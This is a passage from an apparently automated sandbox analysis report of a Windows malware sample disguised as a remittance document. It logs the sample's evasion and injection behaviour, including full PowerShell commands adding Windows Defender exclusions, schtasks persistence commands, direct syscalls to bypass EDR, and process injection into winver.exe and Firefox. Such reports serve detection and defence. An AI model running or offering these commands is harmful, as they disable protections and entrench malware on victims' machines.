            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6ACC mov eax, dword ptr fs:[00000030h]9_2_017E6ACC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798AA0 mov eax, dword ptr fs:[00000030h]9_2_01798AA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798AA0 mov eax, dword ptr fs:[00000030h]9_2_01798AA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6AA4 mov eax, dword ptr fs:[00000030h]9_2_017E6AA4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183EA60 mov eax, dword ptr fs:[00000030h]9_2_0183EA60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C8A90 mov edx, dword ptr fs:[00000030h]9_2_017C8A90
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQueryValueKey: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtOpenKeyEx: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeNtCreateKey: Direct from: 0x76EF2C6C
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory written: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory written: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: NULL target: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\winver.exeThread register set: target process: 8052
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\winver.exeThread APC queued: target process: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeProcess created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"Jump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeProcess created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259762911.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494787567.00000000010C1000.00000002.00000001.00040000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000000.2404245123.0000000001AF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeQueries volume information: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
